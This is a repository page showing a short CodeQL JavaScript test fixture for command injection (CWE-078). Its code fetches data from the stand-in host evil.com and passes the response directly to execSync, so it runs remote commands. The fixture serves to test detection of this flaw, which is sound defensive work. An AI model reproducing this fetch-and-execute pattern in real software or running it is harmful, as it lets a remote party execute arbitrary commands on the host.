hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2025-12-18 09:43:15 +01:00
Code Issues Packages Projects Releases Wiki Activity
Files
codeql-cli-2.7.6
codeql/javascript/ql/test/query-tests/Security/CWE-078/third-party-command-injection.js
Esben Sparre Andreasen f7bfc472c1 JS: treat server responses as untrusted for command injections
2019-09-11 09:38:18 +02:00

9 lines
186 B
JavaScript
Raw Permalink Blame History

let https = require("https"),
cp = require("child_process");
https.get("https://evil.com/getCommand", res =>
res.on("data", command => {
cp.execSync(command);
})
);
Reference in New Issue View Git Blame Copy Permalink